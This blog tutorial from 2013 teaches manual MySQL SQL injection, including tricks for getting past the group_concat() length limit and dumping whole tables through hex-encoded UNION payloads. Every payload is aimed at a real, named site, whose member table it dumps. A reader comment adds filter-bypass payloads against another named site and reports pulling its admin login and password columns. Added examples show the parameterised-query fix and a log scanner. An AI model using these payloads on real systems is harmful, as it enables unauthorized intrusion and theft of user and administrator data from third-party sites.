PART 1 - Advanced SQL Injection - Bypass 1024 Character Limit

[Image: Devil-2-icon.png]

Salam, visitors..



When I started with SQL Injection, at first I used different tools like sqlmap etc. (which is no doubt a very good tool), and I used to wonder why people don't just use these tools and why they prefer manual injection.



Well .. the answer is simple. Lots of things you can do manually can never be done by these tools. Now I only use them when I'm doing Blind Injection.



So, I have decided to write a series of tutorials on SQL Injection from medium to advanced level. There's nothing new from my side in these tutorials except the explanation (the best I can do). I'm just posting what I have learnt. These threads/articles will be my creation: not the methods, but the threads.



I have already posted a Basic Tutorial .. Check it here if you haven't checked it yet.



Adding HTML in SQL Injection ( SQLi FUN )





So, In this first part I'm going to show you guys:

[Image: SQL-tutorial.jpg]


1) How to Bypass 1024 character Limit of group_concat().

2) How to Dump a complete table using single query.





1) How to Bypass 1024 character Limit of group_concat():



Some functions in MySQL are limited to a character length of 1024 characters. Now, this limit can be increased only if you're a MySQL 'Root' User.

But, in our case we do not have the permissions to change these limits.

One of the very handy functions we use in our SQL Injection query is group_concat().

This function returns a string with the concatenated non-NULL values from a group, and by default its output is also limited to a length of 1024 characters.



To demonstrate this whole scenario, I've chosen a few targets. For this example the target I'm going to use is:



hxxp://www.padaweb.org/about.php?cid=2



Here the parameter 'cid' is vulnerable to very simple SQL Injection.



Quickly enumerating the columns with a UNION, this is the query:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+1,2,3,4--


[Image: t1.JPG]


The vulnerable columns are 1 and 2. Column 1 is in the title of the webpage, whereas column 2 is in the page body. I could inject in column 2, but just for the sake of fun I will inject in column 1. First I will use my previous tutorial, "Adding HTML tags in SQL Injection", to bring column 1 from the title of the webpage into the main webpage.



So, by looking at the source:

[Image: t2.JPG]




I know that to bring this column onto the webpage I have to close the <title> tag with </title>. But as Magic Quotes are 'ON', I have to convert my HTML tag to hex first.



My query will be:


hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(</title>,database()),2,3,4--



After converting </title> to HEX:


hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,database()),2,3,4--



And see the result now:

[Image: t3.JPG]

Now if you want to add some colors and stuff follow my previous tutorial.
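The following is an added example, not code from the original post and not the site's own code: it replays the plain UNION payload shown above against a throwaway SQLite database and sets the string-built query beside its hardened form. The `about` table, its columns and the row contents are assumptions made for the example; `magic_quotes()` stands in for PHP's magic_quotes_gpc and shows why it does nothing against a payload that contains no quotes, which is exactly why the post hex-encodes its strings. SQLite has no `concat()` and no `0x..` string literals, so only the first payload from the post is replayed here; `safe_lookup()` is the fix: enforce the parameter's type and bind it.

```python
import sqlite3

# Constructed stand-in for the about.php backend; the table and column names
# are assumptions for this example, not the real site's schema.
SCHEMA = """
CREATE TABLE about (cid INTEGER PRIMARY KEY, title TEXT, body TEXT, extra TEXT);
INSERT INTO about VALUES (1, 'Home',  'Welcome to the site', NULL);
INSERT INTO about VALUES (2, 'About', 'About the organisation', NULL);
"""

# The post's first payload, as it arrives in the cid parameter after URL decoding.
UNION_PAYLOAD = "2 and 0 union select 1,2,3,4--"


def open_db():
    """Fresh in-memory database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def magic_quotes(value):
    """Mimics PHP's magic_quotes_gpc: backslash-escapes quotes and backslashes only."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def vulnerable_lookup(conn, cid):
    """String-built query, the way a typical about.php?cid= handler does it.
    magic_quotes() leaves the payload untouched because it contains no quotes,
    so the 'and 0 union select ...' tail is parsed as SQL."""
    sql = "SELECT cid, title, body, extra FROM about WHERE cid = " + magic_quotes(cid)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, cid):
    """Hardened form: enforce the parameter's type, then bind it.
    The value travels to the driver separately and is never parsed as SQL."""
    try:
        cid_int = int(cid)
    except (TypeError, ValueError):
        return []  # not a plain integer: reject it, do not try to 'clean' it
    return conn.execute(
        "SELECT cid, title, body, extra FROM about WHERE cid = ?", (cid_int,)
    ).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", vulnerable_lookup(db, UNION_PAYLOAD))  # attacker-chosen row
    print("safe:      ", safe_lookup(db, UNION_PAYLOAD))        # []
    print("safe, id 2:", safe_lookup(db, "2"))
```

The vulnerable path returns the attacker's `(1, 2, 3, 4)` row in place of the real page, with the magic-quotes escaping having changed nothing; the hardened path rejects the value before the database ever sees it. Escaping is the wrong tool for a numeric parameter; type validation plus a bound parameter is the fix regardless of the quoting configuration.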



Coming back to the actual goal: by quickly enumerating all the tables I have found an interesting table here, tblMember, in the main database padaorg_pada.




Let's get the column names of this table. The query will be:



Before Converting to HEX:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(</title>,group_concat(<br>,column_name)),2,3,4+from+information_schema.columns+where+table_name=tblMember--



I have to convert the HTML tags to hex and tblMember to CHAR(), as Magic Quotes are 'ON'.



So after converting:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,group_concat(0x3c62723e,column_name)),2,3,4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 77, 101, 109, 98, 101, 114)--



[Image: t4.JPG]



Now, looking at all the column names, someone may think that these are all the column names, but no, there are more; we couldn't dump them because of the 1024 character limit.



Using this query I can find the number of columns in tblMember:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,count(column_name)),2,3,4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 77, 101, 109, 98, 101, 114)--


That is: 35 Rows of Data



[Image: t5.JPG]



So we are missing some columns here.



Let's do one more test. Let's grab the data in some of the columns.



This query will tell me how many entries (rows) there are in this table:


hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,count(*)),2,3,4+from+tblMember--



That is: 45 Rows of Data




[Image: t6.JPG]



Let's see how many we get using group_concat():



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,group_concat(0x3c62723e,Member_Name,0x3a,Date_Time_Created,0x3a,Date_Time_Modified)),2,3,4+from+tblMember--



That is: 18 Rows of Data



[Image: t7.JPG]



So we are definitely missing some data here, and you know the reason.



To bypass this we are going to use simple programming logic, i.e. iteration. Take a look at this code:
PHP Code:

(
  select (@x)                       -- read back the accumulated string
  from (
    select (@x:=0x00),              -- initialise the user variable
           (
             select (0)
             from (information_schema.columns)
             where (table_schema!='information_schema') and (0x00)
               in (@x:=concat(@x,'<br>',table_schema,'-->',table_name,'-->',column_name))
             -- the IN test is never true, so this subquery returns no row,
             -- but concat() still runs once per row and appends to @x
           )
  ) x
)

Yeah .. I know it looks horrible .. but don't worry .. this piece of code will do wonders for us. Let me explain what's happening here.

Warning: if you have a weak heart, leave this thread at this very moment.



So we declare a user variable @x here, and with the help of the nested SELECT we iterate through every table name and column name of all the databases available, except information_schema, which is not required as it just gives access to the metadata of the databases. Because the result is built up row by row with concat() into @x, instead of being returned by group_concat(), the 1024 character limit never applies, and thus all the column names are printed with their respective table names.



I will put this whole code into my SQL Injection query in my vulnerable column, i.e. column 1.



Let's try this. My query will become:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@x) from (select (@x:=0x00), (select (0) from(information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@x:=concat(@x,'<br>',table_schema,'-->',table_name,'-->',column_name))))x)),2,3,4--



But this will NOT work .. why? Because magic quotes are 'ON'. We have to do some hexing here.



So after hexing:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@x) from (select (@x:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x2d2d3e,column_name))))x)),2,3,4--



[Image: t8.JPG]



Let's add some colors to it (be nice please, I know this query will be HUGE):



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@x) from (select (@x:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e742073697a653d22352220636f6c6f723d22726564223e,table_schema,0x3c2f666f6e743e,0x2d2d3e,0x3c666f6e742073697a653d22342220636f6c6f723d22677265656e223e,table_name,0x3c2f666f6e743e,0x2d2d3e3c666f6e7420636f6c6f723d22626c7565223e,column_name))))x)),2,3,4--



Check the result (SWEET):



[Image: t9.JPG]





2) How to Dump a complete table in one go.



So, after all this, there must be a way to dump a whole table (the data in all columns) with one single query. We are going to use a similar code again, but with a little modification.


PHP Code:

(
  select (@)                        -- read back the accumulated string
  from (
    select (@:=0x00),               -- initialise the user variable (MySQL accepts @ with an empty name)
           (
             select (@)
             from TABLE_NAME_HERE
             where (@) in (@:=concat(@,'<br>',FIRST_COLUMN_HERE,'-->',SECOND_COLUMN_HERE,'-->',AND_SO_ON))
             -- the comparison never holds, so no row is returned,
             -- but concat() appends every row's columns to @
           )
  ) a
)


Let's try this. Using this whole code in our query:



hxxp://www.padaweb.org/about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select (@) from (select (@:=0x00), (select (@) from tblMember where (@) in (@:=concat(@,0x3c62723e,0x3c666f6e742073697a653d22352220636f6c6f723d22726564223e,Member_Name,0x3c2f666f6e743e,0x2d2d3e,0x3c666f6e742073697a653d22342220636f6c6f723d22677265656e223e,Date_Time_Created,0x3c2f666f6e743e,0x2d2d3e,0x3c666f6e7420636f6c6f723d22626c7565223e,Date_Time_Modified,0x3c2f666f6e743e))))a)),2,3,4--





[Image: t10.JPG]



That is: 45 (which was previously 18 using group_concat).
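As an added example that is not part of the original post, here is a log-side check a defender can run over web server access logs to spot the queries used in parts 1 and 2. It URL-decodes the query string, decodes the `0x..` hex literals and `CHAR()` sequences that the post uses to get around magic quotes (so `</title>`, `<br>`, `information_schema` and `tblMember` become readable again), and flags the indicators that every payload above shares: `union select`, `information_schema`, the `@x:=` / `@:=` user-variable assignment of the accumulation trick, hex literals, `CHAR()` builders and the trailing `--`. The log lines are constructed for the example in common log format; the IP address, timestamps and response sizes are made up, and the query strings are the post's own as a web server would log them.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (common log format); IP, timestamps and sizes
# are made up. The query strings are the ones shown in the post, as a web
# server would log them (spaces percent-encoded, '+' left as-is).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2013:12:00:01 +0500] "GET /about.php?cid=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Mar/2013:12:00:09 +0500] "GET /about.php?cid=2+and+0+Union+select+1,2,3,4-- HTTP/1.1" 200 4880',
    '203.0.113.5 - - [10/Mar/2013:12:00:31 +0500] "GET /about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,group_concat(0x3c62723e,column_name)),2,3,4+from+information_schema.columns+where+table_name=CHAR(116,%2098,%20108,%2077,%20101,%20109,%2098,%20101,%20114)-- HTTP/1.1" 200 6100',
    '203.0.113.5 - - [10/Mar/2013:12:01:02 +0500] "GET /about.php?cid=2+and+0+Union+select+concat(0x3c2f7469746c653e,(select%20(@x)%20from%20(select%20(@x:=0x00),%20(select%20(0)%20from(information_schema.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x2d2d3e,column_name))))x)),2,3,4-- HTTP/1.1" 200 9200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL = re.compile(r"0x(?:[0-9a-fA-F]{2})+")
CHAR_CALL = re.compile(r"CHAR\(\s*([\d\s,]+)\)", re.IGNORECASE)

# Each indicator is checked against the raw query and against the decoded one,
# so a hex-encoded 'information_schema' is caught as well as a plain one.
INDICATORS = [
    ("union_select", re.compile(r"union\s+(?:all\s+)?select", re.IGNORECASE)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.IGNORECASE)),
    ("user_variable_assign", re.compile(r"@\w*\s*:=")),
    ("hex_literal", HEX_LITERAL),
    ("char_builder", CHAR_CALL),
    ("comment_terminator", re.compile(r"(?:--|#)\s*$")),
]


def _hex_to_text(m):
    """Render a MySQL 0x.. literal as a quoted string, escaping non-printables."""
    text = bytes.fromhex(m.group(0)[2:]).decode("latin-1")
    text = "".join(ch if ch.isprintable() else "\\x%02x" % ord(ch) for ch in text)
    return "'" + text + "'"


def _char_to_text(m):
    """Render CHAR(116, 98, ...) as the string it builds."""
    codes = [int(c) for c in m.group(1).split(",") if c.strip()]
    return "'" + "".join(chr(c) for c in codes) + "'"


def decode_literals(sql_fragment):
    """Undo the hex/CHAR() encoding so the injected SQL and HTML are readable."""
    return CHAR_CALL.sub(_char_to_text, HEX_LITERAL.sub(_hex_to_text, sql_fragment))


def analyze_line(line):
    """Return a finding for one log line, or None if nothing is suspicious."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    uri = m.group(1)
    raw_query = unquote_plus(uri.partition("?")[2])
    decoded = decode_literals(raw_query)
    hits = [name for name, rx in INDICATORS if rx.search(raw_query) or rx.search(decoded)]
    if not hits:
        return None
    return {"uri": uri, "decoded_query": decoded, "indicators": hits}


def scan(lines):
    """Run analyze_line over a log and keep only the flagged requests."""
    return [f for f in (analyze_line(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(", ".join(finding["indicators"]))
        print("   ", finding["decoded_query"])
```

The first sample line (a normal `cid=2` request) produces no finding; the three payload lines are flagged, and the decoded query shows the plain `</title>` and `<br>` tags and the `tblMember` / `information_schema` strings that the hex and `CHAR()` encoding hid from a naive keyword match. The `@x:=` assignment inside a request parameter is the most specific signal for the accumulation trick in parts 1 and 2, since normal application queries never carry user-variable assignments in URL parameters.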







That's it for the day.. The best SQL injectors I've ever known .. I hope this was informative .. Thank you so much for reading one of the longest threads.


NOTE: If you copy and paste these links from here into your browser tab, paste them into Notepad first and delete these bugs ..



[Image: bug.JPG]

These bugs appear because when we copy and paste directly from the blog/thread page, we also copy some Unicode characters, like the zero width space (&#8203;, U+200B), which, when it ends up inside a query, stops the results from showing properly ..

About The Author

Salman Rafiq
Salman Rafiq is the founder of 'My Basic Tricks'. I am a Security Researcher and Ethical Hacker with experience in various aspects of Information Security; other than that I am an SEO expert and a blogger. All my efforts are to make the internet more secure..

13 comments:

  1. salam bro
    yes yes LOool
    Only this strongest explanation banner and it is very new ways
    But I noticed that commands very large and complex hhh ok oky
    some novices Brotherhood will not understand..so MY RATING you 10/10 very good
    See here
    This is an Islamist Web site but will only try it....just traineeship oky?
    http://www.gazelles.ma/produit.php?cat=60& id=2'
    http://www.gazelles.ma/produit.php?cat=60& id=2 +order+by 1,2222,3,4 --
    http://www.gazelles.ma/produit.php?cat=60& id=-2 +union+select+ 1,2222,3,4 --
    Here can not control ..union+select ..
    +and+0+/*!50000Union*/+/*!50000select*/+
    Or thiS
    +and+0+/*!12345Union*/+/*!12345select*/+
    Or this but here Stop but if he refuses selct and union..!
    +and+0+(/*!NIUnionEN*/)+(/*!SELselectECT*/)+
    http://www.gazelles.ma/produit.php?cat=60& id=/*!-2 +unionUnion+selectSelect+ 1,2222,3,4 --
    In each case the result appeared ..
    http://www.gazelles.ma/produit.php?cat=60&id=-2+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000CONCAT(Column_Name,0x3e,Table_Schema,0x3e,table_Name)*/)),3,4+/*!50000FROM*/Information_Schema.Columns limit 552,1--
    look here limit table 552,1 not 1 ..2 or 5 just 552
    admin_id>gaz8_bd>admin
    admin_login>gaz8_bd>admin
    admin_pass>gaz8_bd>admin
    The end result
    my question now is How can coded like with these orders?
    I'm sorry for bad language..


Copyright © 2013 My Basic Tricks and Salman Rafiq.